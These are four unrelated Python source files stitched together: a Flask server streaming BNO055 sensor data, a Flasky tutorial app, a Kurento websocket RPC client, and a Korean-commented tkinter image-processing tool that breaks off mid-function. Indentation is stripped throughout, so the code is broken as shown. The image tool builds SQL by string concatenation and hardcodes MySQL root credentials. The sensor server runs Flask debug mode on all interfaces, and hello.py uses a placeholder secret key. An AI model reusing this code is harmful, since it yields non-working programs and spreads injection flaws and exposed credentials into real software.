# Author: Tony DiCola
# 2019 update: Carter Nelson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import json
import logging
import threading
import time
from flask import *
import board
import busio
import adafruit_bno055
i2c = busio.I2C(board.SCL, board.SDA)
# Create the BNO sensor connection.
bno = adafruit_bno055.BNO055(i2c)
# Application configuration below. You probably don't need to change these values.
# How often to update the BNO sensor data (in hertz).
BNO_UPDATE_FREQUENCY_HZ = 10
# Name of the file to store calibration data when the save/load calibration
# button is pressed. Calibration data is stored in JSON format.
CALIBRATION_FILE = 'calibration.json'
# BNO sensor axes remap values. These are the parameters to the BNO.set_axis_remap
# function. Don't change these without consulting section 3.4 of the datasheet.
# The default axes mapping below assumes the Adafruit BNO055 breakout is flat on
# a table with the row of SDA, SCL, GND, VIN, etc pins facing away from you.
#BNO_AXIS_REMAP = { 'x': BNO055.AXIS_REMAP_X,
# 'y': BNO055.AXIS_REMAP_Z,
# 'z': BNO055.AXIS_REMAP_Y,
# 'x_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'y_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'z_sign': BNO055.AXIS_REMAP_NEGATIVE }
# Create flask application.
app = Flask(__name__)
# Global state to keep track of the latest readings from the BNO055 sensor.
# This will be accessed from multiple threads so care needs to be taken to
# protect access with a lock (or else inconsistent/partial results might be read).
# A condition object is used both as a lock for safe access across threads, and
# to notify threads that the BNO state has changed.
bno_data = {}
bno_changed = threading.Condition()
# Background thread to read BNO sensor data. Will be created right before
# the first request is served (see start_bno_thread below).
bno_thread = None
def read_bno():
"""Function to read the BNO sensor and update the bno_data object with the
latest BNO orientation, etc. state. Must be run in its own thread because
it will never return!
"""
while True:
# Capture the lock on the bno_changed condition so the bno_data shared
# state can be updated.
with bno_changed:
bno_data['euler'] = bno.euler
bno_data['temp'] = bno.temperature
bno_data['quaternion'] = bno.quaternion
bno_data['calibration'] = bno.calibration_status
# Notify any waiting threads that the BNO state has been updated.
bno_changed.notifyAll()
# Sleep until the next reading.
time.sleep(1.0/BNO_UPDATE_FREQUENCY_HZ)
def bno_sse():
"""Function to handle sending BNO055 sensor data to the client web browser
using HTML5 server sent events (aka server push). This is a generator function
that flask will run in a thread and call to get new data that is pushed to
the client web page.
"""
# Loop forever waiting for a new BNO055 sensor reading and sending it to
# the client. Since this is a generator function the yield statement is
# used to return a new result.
while True:
# Capture the bno_changed condition lock and then wait for it to notify
# a new reading is available.
with bno_changed:
bno_changed.wait()
# A new reading is available! Grab the reading value and then give
# up the lock.
heading, roll, pitch = bno_data['euler']
temp = bno_data['temp']
x, y, z, w = bno_data['quaternion']
sys, gyro, accel, mag = bno_data['calibration']
# Send the data to the connected client in HTML5 server sent event format.
data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': temp,
'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w,
'calSys': sys, 'calGyro': gyro, 'calAccel': accel, 'calMag': mag }
yield 'data: {0}\n\n'.format(json.dumps(data))
@app.before_first_request
def start_bno_thread():
# Start the BNO thread right before the first request is served. This is
# necessary because in debug mode flask will start multiple main threads so
# this is the only spot to put code that can only run once after starting.
# See this SO question for more context:
# http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug
global bno_thread
# Kick off BNO055 reading thread.
bno_thread = threading.Thread(target=read_bno)
bno_thread.daemon = True # Don't let the BNO reading thread block exiting.
bno_thread.start()
@app.route('/bno')
def bno_path():
# Return SSE response and call bno_sse function to stream sensor data to
# the webpage.
return Response(bno_sse(), mimetype='text/event-stream')
@app.route('/save_calibration', methods=['POST'])
def save_calibration():
# Save calibration data to disk.
#
# TODO: implement this
#
return 'OK'
@app.route('/load_calibration', methods=['POST'])
def load_calibration():
# Load calibration from disk.
#
# TODO: implement this
#
return 'OK'
@app.route('/')
def root():
return render_template('index.html')
if __name__ == '__main__':
# Create a server listening for external connections on the default
# port 5000. Enable debug mode for better error messages and live
# reloading of the server on changes. Also make the server threaded
# so multiple connections can be processed at once (very important
# for using server sent events).
app.run(host='0.0.0.0', debug=True, threaded=True)
|
hello.py
|
from flask import Flask, render_template, session, redirect, url_for, flash
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager, Shell
from flask_moment import Moment
from flask_mail import Mail, Message
from flask_wtf import Form
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from datetime import datetime
from threading import Thread
import os
app = Flask(__name__)
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] =\
'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
app.config['MAIL_SERVER'] = 'smtp.qq.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[FLASKY]'
app.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin <a35486882@qq.com>'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
manager = Manager(app)
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
mail = Mail(app)
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
users = db.relationship('User', backref='role', lazy='dynamic')
def __repr__(self):
return '<Role %r>' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return '<User {}>'.format(self.username)
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username=form.name.data)
db.session.add(user)
session['known'] = False
if app.config['FLASKY_ADMIN']:
send_email(app.config['FLASKY_ADMIN'], 'New User', 'mail/new_user',
user=user)
else:
session['known'] = True
session['name'] = form.name.data
flash('Looks like you have changed your name!')
form.name.data = ''
return redirect(url_for('index'))
return render_template('index.html', current_time=datetime.utcnow(), form=form,
name=session.get('name'), known=session.get('known'))
@app.route('/user/<name>')
def user(name):
return render_template('user.html', name=name)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
class NameForm(Form):
name = StringField('What`s your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
# mail.send(msg)
# print(to, subject, template, **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell', Shell(make_context=make_shell_context))
if __name__ == '__main__':
manager.run()
|
transport.py
|
import websocket
import json
import time
import threading
import logging
logger = logging.getLogger(__name__)
class TimeoutException(Exception):
pass
class Timeout(object):
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
self.timer = None
def handle_timeout(self):
raise TimeoutException(self.error_message)
def __enter__(self):
self.timer = threading.Timer(self.seconds, self.handle_timeout)
def __exit__(self, type, value, traceback):
if self.timer:
self.timer.cancel()
class KurentoTransportException(Exception):
def __init__(self, message, response={}):
super(KurentoTransportException, self).__init__(message)
self.response = response
def __str__(self):
return "%s - %s" % (str(self.message), json.dumps(self.response))
class KurentoTransport(object):
def __init__(self, url):
logger.debug("Creating new KurentoTransport with url: %s" % url)
self.url = url
self.ws = websocket.WebSocket()
self.current_id = 0
self.session_id = None
self.pending_operations = {}
self.subscriptions = {}
self.on_event = {}
self.stopped = False
self.thread = threading.Thread(target=self._run_thread)
self.thread.daemon = True
self.thread.start()
def __del__(self):
logger.debug("Destroying KurentoTransport with url: %s" % self.url)
self.stopped = True
self.ws.close()
def _check_connection(self):
if not self.ws.connected:
logger.info("Kurent Client websocket is not connected, reconnecting")
try:
with Timeout(seconds=5):
self.ws.connect(self.url)
logger.info("Kurent Client websocket connected!")
except TimeoutException:
# modifying this exception so we can differentiate in the receiver thread
raise KurentoTransportException("Timeout: Kurento Client websocket connection timed out")
def _run_thread(self):
while not self.stopped:
try:
self._check_connection()
with Timeout(seconds=1):
self._on_message(self.ws.recv())
except TimeoutException:
logger.debug("WS Receiver Timeout")
except Exception as ex:
logger.error("WS Receiver Thread %s: %s" % (type(ex), str(ex)))
def _next_id(self):
self.current_id += 1
return self.current_id
def _on_message(self, message):
resp = json.loads(message)
logger.debug("received message: %s" % message)
if 'method' in resp:
if (resp['method'] == 'onEvent' and 'params' in resp and 'value' in resp['params']):
if ('subscription' in resp['params'] and resp['params']['subscription'] in self.subscriptions):
sub_id = resp['params']['subscription']
fn = self.subscriptions[sub_id]
self.session_id = resp['params']['sessionId'] if 'sessionId' in resp['params'] else self.session_id
fn(resp["params"]["value"])
elif 'object' in resp['params']['value'] and resp['params']['value']['object'] in self.on_event:
obj = self.on_event[resp['params']['value']['object']]
if 'type' in resp['params']['value'] and resp['params']['value']['type'] in obj:
fn = obj[resp['params']['value']['type']]
fn(resp["params"]["value"])
else:
if 'result' in resp and 'sessionId' in resp['result']:
self.session_id = resp['result']['sessionId']
self.pending_operations["%d_response" % resp["id"]] = resp
def _rpc(self, rpc_type, **args):
if self.session_id:
args["sessionId"] = self.session_id
request = {
"jsonrpc": "2.0",
"id": self._next_id(),
"method": rpc_type,
"params": args
}
req_key = "%d_request" % request["id"]
resp_key = "%d_response" % request["id"]
self.pending_operations[req_key] = request
self._check_connection()
logger.debug("sending message: %s" % json.dumps(request))
self.ws.send(json.dumps(request))
while (resp_key not in self.pending_operations):
time.sleep(0.01)
resp = self.pending_operations[resp_key]
del self.pending_operations[req_key]
del self.pending_operations[resp_key]
if 'error' in resp:
raise KurentoTransportException(resp['error']['message'] if 'message' in resp['error'] else 'Unknown Error', resp)
elif 'result' in resp and 'value' in resp['result']:
return resp['result']['value']
else:
return None # just to be explicit
def create(self, obj_type, **args):
return self._rpc("create", type=obj_type, constructorParams=args)
def invoke(self, object_id, operation, **args):
if args:
return self._rpc("invoke", object=object_id, operation=operation, operationParams=args)
else:
return self._rpc("invoke", object=object_id, operation=operation)
def subscribe(self, object_id, event_type, fn):
subscription_id = self._rpc("subscribe", object=object_id, type=event_type)
# self.subscriptions[subscription_id] = fn
# kurento 6.0 protocol workaround...
if object_id not in self.on_event:
self.on_event[object_id] = {}
self.on_event[object_id][event_type] = fn
return subscription_id
def unsubscribe(self, subscription_id):
del self.subscriptions[subscription_id]
return self._rpc("unsubscribe", subscription=subscription_id)
def release(self, object_id):
return self._rpc("release", object=object_id)
|
day12_04.py
|
##히스토그램
#엠보싱 샤프닝등의 처리기법
from statistics import median
from tkinter import *
import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import matplotlib.pyplot as plt
## 함수 선언부
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # 파일 크기 확인
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'rb') # 파일 열기(바이너리 모드)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 기존에 캐버스 있으면 뜯어내기.
if canvas != None :
canvas.destroy()
# 화면 준비 (고정됨)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # 영상이 128미만이면
VIEW_X = outW
VIEW_Y = outH
step = 1 # 건너뛸숫자
else :
step = int(outW / VIEW_X)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
# 화면에 출력
def putPixel() :
for i in range(0, outH,step) :
for k in range(0, outW,step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum, rawMax, rawMin, rawMeadian = 0, 0, 0, 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
inRawAvg = int(rawSum / (inH * inW))
rawMax = max(map(max, inImage))
rawMin = min(map(min, inImage))
rawMedian = int(median(map(median, inImage)))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # 부모(window)에 종속된 서브윈도
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 합계 -->' + str(rawSum))
label1.pack()
label2 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
label2.pack()
label3 = Label(subWindow, text='입력영상 최댓값 -->' + str(rawMax))
label3.pack()
label4 = Label(subWindow, text='입력영상 최소값 -->' + str(rawMin))
label4.pack()
label5 = Label(subWindow, text='입력영상 중위수 -->' + str(rawMedian))
label5.pack()
subWindow.mainloop()
def upDown() : # 상하 반전 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[outW-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # 축소하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + ", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) +"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" +fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + ", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" +fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) +"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.98.131', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # ['강아지:128', '강아지:512' ....]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## 내부 함수 (Inner Function) : 함수 안의 함수,지역함수 #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" +fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w', defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # 약 0.34 쯤
for r in range(outH):
ws.set_row(r, 9.5) # 약 0.35 쯤
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
# data 값으로 셀의 배경색을 조절 #000000~#FFFFFF
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# 셀의 포맷을 준비
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histogram() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
normalList = [0]*256
countList = [0]*256
for i in range(outH):
for k in range(outW):
value = outImage[i][k]
countList[value] += 1
#정규화된 값 = (카운트값 - 최소값) * high/(최대값 - 최소값)
maxVal = max(countList)
minVal = min(countList)
for i in range(len(countList)):
normalList[i] = (countList[i] - minVal)*256/(maxVal-minVal)
#화면 출력하기
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width = 256, height = 256)
subPaper = PhotoImage(width = 256, height = 256)
subCanvas.create_image((256/2,256/2), image = subPaper, state = 'normal')
for i in range(0,256) :
for k in range(0, int(normalList[i])):
data = 0
subPaper.put('#%02x%02x%02x' % (data,data,data),(i,255-k))
subCanvas.pack(expand = 1, anchor = CENTER)
subWindow.mainloop()
def a_histogram2() : # 입출력 영상의 평균값
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0]*256
for i in range(outH):
for k in range(outW):
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def endInSearch() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH
outImage = []; tmpList = []
value = 0
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal , minVal , HIGH= 0,255,255 #HIGH는 고정
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal:
maxVal = data
if data < minVal :
minVal = data
limit = askinteger("앤드인"," 상하 범위 : ",minvalue = 1, maxvalue = 127)
maxVal -= limit
minVal += limit
#히스토그램 스트래칭
#new = (old - min) * HIGH / (max-min) : 정규화 공식과 비슷하다
# out = (in - min) * HIGH / (max-min)
for i in range(inH):
for k in range(inW):
value = int( (inImage[i][k] - minVal) * HIGH / (maxVal-minVal))
if value<0:
value = 0
if value>255:
value =255
outImage[i][k] =value
display()
def embossing() : # 엠보싱
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH,value
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
MSIZE = 3
mask = [[-1,0,0],[0,0,0],[0,0,1]]
#임시 임력 영상 = inImage보다 2열이 큰 영상이 필요하다.
#임시영상 ==> inImage에 1pixel의 테두리가 사방에 있는 영상 영역
tmpInImage = []
for i in range(inH + 2) :
tmpList = []
for k in range(inW + 2) :
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpOutImage.append(tmpList)
#원래 입력 --> 임시 입력
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
#회선연산하기 , 마스크로 쭉 긁으면서 계산하기
for i in range(1,inH):
for k in range(1,inW):
